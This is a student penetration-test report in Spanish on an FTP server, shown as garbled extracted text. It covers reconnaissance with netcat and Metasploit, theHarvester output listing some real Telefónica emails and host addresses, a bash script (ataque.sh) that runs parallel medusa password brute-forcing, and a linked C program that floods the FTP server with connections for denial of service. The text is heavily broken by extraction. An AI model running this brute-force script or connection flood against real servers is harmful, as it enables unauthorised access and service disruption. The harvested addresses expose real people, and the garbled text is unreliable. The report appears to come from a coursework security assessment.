Академический Документы
Профессиональный Документы
Культура Документы
DavidNezlvarez PSI2011/2012
1.Inicio LoprimeroqueharemosserconseguirsudireccinIP:
$ n s l o o k u p f t p . o b j e t i v o . c o m N a m e :f t p . o b j e t i v o . c o m A d d r e s s : 1 . . . 6
EstaIPserlabasedetodasnuestraspruebas.
1.1)Empezaremosintentandohacerunpingalobjetivo.
$pingc31...6 PING1...6(1...6)56(84)bytesofdata. 1...6pingstatistics 3packetstransmitted,0received,100%packetloss,time2009ms
3.2)Hacemosusodelaherramientanetcatparaconectarnosalospuertosintentandobuscar algnmensajedebienvenidaenalgunodeellosquenosdealgunainformacinamayores.
$ n cvn1 . . . 6 2 1 ( U N K N O W N )[ 1 . . . 6 ]2 1( f t p )o p e n 2 2 0 B i e n v e n i d oa lF T P( o v e rs s l )d e . 2 2 0W e l c o m et ot h e F T Ps e r v e r . $n cvn1 . . . 6 1 0 0 5 0 ( U N K N O W N )[ 1 . . . 6 ]1 0 0 5 0( z a b b i x a g e n t )o p e n $n cvn1 . . . 6 4 9 1 5 5 ( U N K N O W N )[ 1 . . . 6 ]4 9 1 5 5( ? )o p e n
Conlosmensajesdebienvenidanoseconsiguinadaperovemosquenetcatasociaalpuerto 10050laherramientademonitorizacinzabbix.
3.3)Otrapruebapodraserbuscarenlapaqueteraquesegeneraenlaconexinalserviciodel puerto10050conalgunaherramientacomowireshark.
Wiresharkasociatambindichopuertoazabbix.
Ejemplodecmoseusaraelexploitparazabbixenmetasploit:
$m s f c o n s o l e # # # # # # # # # ## # # # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # # # # ## # # # # # # # # # ## # # # # # # # # # # # # # # # # # # # # # ### # # # # # # # # ## # # # # # # # # # # # # # ## # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ## # #
Despusdevercmoseusametasploitvamosabuscarexploitsquepuedanvalernospara zabbixoMSRPC.
1Windows2000ServerSP0SP4+English 2Windows2000ServerSP0SP4+Italian 3Windows2000ServerSP0SP4+French 4Windows2003ServerSP0English 5Windows2003ServerSP0French 6Windows2003ServerSP1SP2English 7Windows2003ServerSP1SP2French 8Windows2003ServerSP1SP2Spanish 9Windows2003ServerSP1SP2Italian 10Windows2003ServerSP1SP2German)
6)Anlisisyexplotacindevulnerabilidades.(PASSWORDGUESSINGFTP) Porotrapartesigueestandoelservidorftp.Enltenemosaccesoaalgunascarpetascomo usuarioannimo,perohayotrasalasqueslopuedenaccederusuariosregistrados. Algoquesepodraintentareselaccesoadichosdirectorios,paraellointentaremosloguearnos comousuarioconherramientasdepasswordguessing. Esteesunprocesolargoybastantecomplicado,yaquelamayoradelasherramientas pruebanpasswordsporfuerzabruta,nosfacilitaraalgoeltrabajosaberdequestformadala contrasea,cuantoscaracterestiene... Tambinharaeltrabajomuchomssencilloelteneryaelnombredealgnusuariodel sistema. Nosotrossabemosquelosnombresdeusuarioparaelservidorftpsonsusdireccionesde correo. 6.1)Haymuchasmanerasdeconseguirunlogindeunusuario,perosiademssabemosque esladireccindecorreo,unscriptllamado"theHarvester.py"nospuedesermuytil. http://www.edgesecurity.com/theHarvester.php Estescriptnosdaremails,nombresdeusuario,subdominiosynombresdehostbuscandoen google,bing...Delaorganizacinqueleindiquemos. Unejemploparaunacompaacomotelefnicaseraelsiguiente: Lasalidaestacortadaylosemailsmodificados,perosepuedevercomofuncionaradicho script.
$p y t h o nt h e H a r v e s t e r . p ydt e l e f o n i c a . c o ml2 0 0ba l l * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * T h e H a r v e s t e rV e r .2 . 2 * C o d e db yC h r i s t i a nM a r t o r e l l a * E d g e S e c u r i t yR e s e a r c h * c m a r t o r e l l a @ e d g e s e c u r i t y . c o m F u l lh a r v e s t . . [ ]S e a r c h i n gi nG o o g l e . . S e a r c h i n g0r e s u l t s . . . S e a r c h i n g1 0 0r e s u l t s . . . S e a r c h i n g2 0 0r e s u l t s . . . [ ]S e a r c h i n gi nP G PK e ys e r v e r . . [ ]S e a r c h i n gi nB i n g . . S e a r c h i n g1 0 0r e s u l t s . . . S e a r c h i n g2 0 0r e s u l t s . . . [ ]S e a r c h i n gi nE x a l e a d . . * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
S e a r c h i n g1 0 0r e s u l t s . . . S e a r c h i n g2 0 0r e s u l t s . . . [ + ]E m a i l sf o u n d : a c i o f u n d a c i o n . a r @ t e l e f o n i c a . c o m i o r e c e p c i o n . a r @ t e l e f o n i c a . c o m i n i o s @ e t e l e f o n i c a . c o m r i n g . t i w s @ t e l e f o n i c a . c o m n n a . r o m a n o @ t e l e f o n i c a . c o m a r f . r a m i r e z @ t e l e f o n i c a . c o m . . . . . . . . . a r r f @ t e l e f o n i c a . c o m i g V i @ t e l e f o n i c a . c o m d e m o . t e l e f o n i c a . c o m a l c h @ t e l e f o n i c a . c o m z a l c r @ t e l e f o n i c a . c o m z d @ t e l e f o n i c a . c o m [ + ]H o s t sf o u n di ns e a r c he n g i n e s : 1 9 5 . 5 3 . 1 6 9 . 5 7 : w w w . t e l e f o n i c a . c o m 2 0 0 . 8 1 . 3 6 . 1 4 : m a i l u s . t e l e f o n i c a . c o m 2 0 0 . 8 1 . 3 6 . 1 4 : m a i l a r . t e l e f o n i c a . c o m 8 1 . 2 0 0 . 6 4 . 1 8 0 : w w w . i n f o m a i l . t e l e f o n i c a . c o m 6 6 . 2 3 1 . 2 3 3 . 2 1 2 : l i v e . u s . t e l e f o n i c a . c o m 1 9 5 . 5 5 . 7 5 . 2 4 5 : w w w . f u n d a c i o n . t e l e f o n i c a . c o m . . . . . . . . . 2 1 6 . 1 7 7 . 1 9 9 . 9 3 : u s . t e l e f o n i c a . c o m 1 9 5 . 5 3 . 1 6 9 . 9 : s a l a d e p r e n s a . t e l e f o n i c a . c o m 1 9 5 . 5 5 . 7 5 . 2 4 5 : w w w . f u n d a c i o n . t e l e f o n i c a . c o m 2 1 6 . 1 7 7 . 1 9 9 . 9 3 : w w w . m u l t i n a t i o n a l s o l u t i o n s . t e l e f o n i c a . c o m [ + ]V i r t u a lh o s t s : = = = = = = = = = = = = = = = = = = 1 9 5 . 5 3 . 1 6 9 . 5 7 1 9 5 . 5 3 . 1 6 9 . 5 7 1 9 5 . 5 3 . 1 6 9 . 5 7 1 9 5 . 5 3 . 1 6 9 . 5 7 . . . . . . . . . 2 1 2 . 3 6 . 8 2 . 1 3 0 2 1 2 . 3 6 . 8 2 . 1 3 0 2 1 2 . 3 6 . 8 2 . 1 3 0 7 9 . 1 2 5 . 1 2 5 . 3 7 9 . 1 2 5 . 1 2 5 . 3 7 9 . 1 2 5 . 1 2 5 . 3 w w w . m a r a t o n d e g a z a . c o m w w w . q u i c k l y c o n t a c t . n e t m a x c o n n . a r a n c h a r u i z . c o m r e d p a c i e n t e s . c o m a t l a s . t e l e f o n i c a . c o m i n f o r m e r c . t e l e f o n i c a . c o m w w w . t e l e f o n i c a . c o m c e s a r a l i e r t a . t e l e f o n i c a . c o m w w w . v e . t e l e f o n i c a . c o m j u l i o l i n a r e s . t e l e f o n i c a . c o m
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * a t a q u e . s h * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * # ! / b i n / b a s h i f[ [$ #! =4] ] ; t h e n e c h o" . / s c r i p t< n p r o c >< f i c h e r o p a s s >< h o s t >< u s u a r i o > " e c h o "n p r o c =n u m e r op r o c e s o sae j e c u t a re np a r a l e l o " e c h o "h o s t=h o s taa t a c a rc o nm e d u s a " e c h o "u s u a r i o=u s u a r i oap r o b a rc o nm e d u s a " e x i t ; f i n p r o c = $ 1 ; e n t r a d a = $ 2 ; h o s t = $ 3 ; u s u a r i o = $ 4 ;
e c h on"D i v i d i e n d oa r c h i v od ep a s s w d" # p a r t i m o se la r c h i v oe nt a n t o sa r c h i v o sc o m op r o c e s o ss ei n d i q u e w h i l er e a dl i n e d o i f[ [$ il t$ l i m i t e] ] ; t h e n e c h o" $ l i n e "> >s a l i d a $ j . t x t ; i = $ [ $ i+1 ] ; e l s e j = $ [ $ j+1 ] ; i = 0 ; f i d o n e<$ 2 e c h o" [ C O M P L E T A D O ] " # s ee j e c u t ae np a r a l e l on p r o cm e d u s a # u n oc o nc a d aa r c h i v od ep a s s w o r d s f o r( (k=0;k< =$ j;k + +) ) d o m e d u s ah$ 3u$ 4Ps a l i d a $ k . t x tMf t pv 6& d o n e
# b o r r a ra r c h i v o sa u x i l i a r e s # r ms a l i d a * ; * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Unejemplodeusodelscriptcon5ejecucionesparalelassera: (./ataqueNUMEROPROCESOSFICHEROPASSWORDS.txtIPNOMBREUSUARIO):
$. / a t a q u e . s h5p a s s w o r d s 2 . t x t1 . . . 6 a d m i n D i v i d i e n d oa r c h i v od ep a s s w d[ C O M P L E T A D O ] $M e d u s av 2 . 0[ h t t p : / / w w w . f o o f u s . n e t ]( C )J o M o K u n/F o o f u sN e t w o r k s< j m k @ f o o f u s . n e t >
G E N E R A L :P a r a l l e lH o s t s :1P a r a l l e lL o g i n s :1 G E N E R A L :T o t a lH o s t s :1 G E N E R A L :T o t a lU s e r s :1 G E N E R A L :T o t a lP a s s w o r d s :2 0 0 M e d u s av 2 . 0[ h t t p : / / w w w . f o o f u s . n e t ]( C )J o M o K u n/F o o f u sN e t w o r k s< j m k @ f o o f u s . n e t > G E N E R A L :P a r a l l e lH o s t s :1P a r a l l e lL o g i n s :1 G E N E R A L :T o t a lH o s t s :1 G E N E R A L :T o t a lU s e r s :1 G E N E R A L :T o t a lP a s s w o r d s :1 9 6 M e d u s av 2 . 0[ h t t p : / / w w w . f o o f u s . n e t ]( C )J o M o K u n/F o o f u sN e t w o r k s< j m k @ f o o f u s . n e t > G E N E R A L :P a r a l l e lH o s t s :1P a r a l l e lL o g i n s :1 G E N E R A L :T o t a lH o s t s :1
. . .
6)Anlisisyexplotacindevulnerabilidades.(FLOODFTP) Comosepudoobservarenelapartadoanteriorelservidorftpnotienelmitedeconexionespara unamismaIP,nibloqueaIPsquehaganmuchosintentosfallidosdeconexin. Estotambinpodraservirpararealizarataquesdedenegacindeservicio,enunservidorftp sintirarabajodichoservidorunataquededenegacindeserviciopodraserelobtenertodaslas conexionesquepermitaestablecerelservidor,impidiendoquelosdemsusuariospuedan conectarse. SecreunprogramaenC,floodftp,(http://pastebin.com/mFJiPmBB)queestablece conexionesannimascontraunservidorftpynolascierra. Elprogramaseejecutara:
$ . / f l o o d f t p 1 . . . 6
E lp r o g r a m aq u e d ae j e c u t n d o s e ,l e y e n d on m e r o sei n t e n t a n d oh a c e re s en m e r od ec o n e x i o n e s c o n t r ae ls e r v i d o rf t p .
Haciendodiversaspruebasenelservidoryalavezmostrandolasconexionesestablecidas entrenuestramquinayelservidor:
$ w a t c hn1 ' n e t s t a tt u p e n|g r e pf l o o d f t p|g r e pE S T A B L I S H E D|w cl '
Finalmentesellegaalaconclusindequeelservidoresbastanteseguro,estlo suficientementeparcheadooactualizadoparaquenotengavulnerabilidadesenlasaplicaciones quetienecorriendo. Centrndonosenlaaplicacinpropiadelservidorftpdelpuerto21,stapermitemltiples conexionesdeunamismaIPymltiplesintentosdeiniciosesinfallidos. LasmltiplesconexionesdesdeunamismaIPnospermitenpoderobteneraunmismousuario todaslasconexionesimpidiendoalosdemsconectarse. Perosisecortaestoseimpediraqueporejemploenlugaresenlosqueunconjuntode mquinassalenatravsdelamismaIP,comopuedeserlafacultad,nospudisemosconectar simultneamenteaesteservidordeinternet. Lapartedequeelservidornolmiteelnmerodeintentosdelogearsepodraconsiderarseun fallodeseguridad,perosilascontraseassonlosuficientementeseguras,seracasiimposible conherramientasdepasswordguessingremotoobtenerunacontrasea.